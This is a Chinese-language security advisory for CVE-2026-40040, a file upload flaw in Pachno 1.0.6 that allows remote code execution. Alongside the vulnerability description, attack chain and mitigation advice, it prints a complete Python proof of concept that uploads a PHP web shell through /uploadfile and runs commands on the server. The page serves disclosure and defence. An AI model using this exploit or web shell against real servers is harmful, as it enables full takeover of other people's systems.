CVE-2026-40040 CVSS 8.8 高危

CVE-2026-40040 Pachno 任意文件上传致远程代码执行漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40040

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Pachno

漏洞概述

Pachno 1.0.6版本存在严重的任意文件上传漏洞。由于系统对文件扩展名的过滤机制存在缺陷，经过身份验证的攻击者可绕过限制，通过/uploadfile接口上传.php5等可执行脚本至Web目录。成功利用该漏洞可导致服务器被完全控制，实现远程代码执行，对系统机密性、完整性和可用性造成严重影响。

技术细节

该漏洞源于Pachno在处理文件上传请求时，未能有效实施扩展名白名单验证。攻击者利用低权限账户访问/uploadfile端点，通过构造包含恶意PHP代码的文件（如使用.php5后缀），即可绕过无效的过滤机制。文件被上传至Web可访问目录后，攻击者通过浏览器直接请求该文件URL，服务器会将其作为PHP脚本解析执行，从而允许攻击者在服务器上下文中执行任意系统命令，完全控制受害服务器。

攻击链分析

STEP 1

侦察与获取凭证

攻击者确认目标使用Pachno系统，并获取一个低权限的合法账户凭证。

STEP 2

构造恶意文件

攻击者编写包含恶意PHP代码的脚本，并将其后缀修改为.php5等非常规扩展名以绕过过滤。

STEP 3

上传文件

攻击者利用低权限账户，向/uploadfile端点发送POST请求，上传构造好的恶意文件。

STEP 4

触发执行

攻击者通过浏览器访问上传文件的URL，服务器解析并执行PHP代码，从而获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target = "http://example.com"
login_url = f"{target}/login"
upload_url = f"{target}/uploadfile"
shell_name = "exploit.php5"

# Attacker credentials
credentials = {
    "username": "low_priv_user",
    "password": "password"
}

# 1. Establish session and login
session = requests.Session()
session.post(login_url, data=credentials)

# 2. Prepare malicious PHP payload
# Using .php5 extension to bypass weak filtering
payload = "<?php system($_GET['cmd']); ?>"
files = {
    'file': (shell_name, payload, 'application/x-httpd-php')
}

# 3. Upload the file
response = session.post(upload_url, files=files)

if response.status_code == 200:
    print(f"[+] File uploaded: {target}/uploads/{shell_name}")
    # 4. Execute command (e.g., id)
    cmd_url = f"{target}/uploads/{shell_name}?cmd=id"
    r = session.get(cmd_url)
    print(f"[+] Command output: {r.text}")
else:
    print("[-] Upload failed")

影响范围

Pachno 1.0.6

防御指南

临时缓解措施

建议立即升级至修复版本。如暂时无法升级，应在Web服务器（如Nginx或Apache）配置中，禁止上传目录（如/uploads）的PHP脚本解析权限，并严格限制允许上传的文件扩展名，仅接受图片或文档等非可执行文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表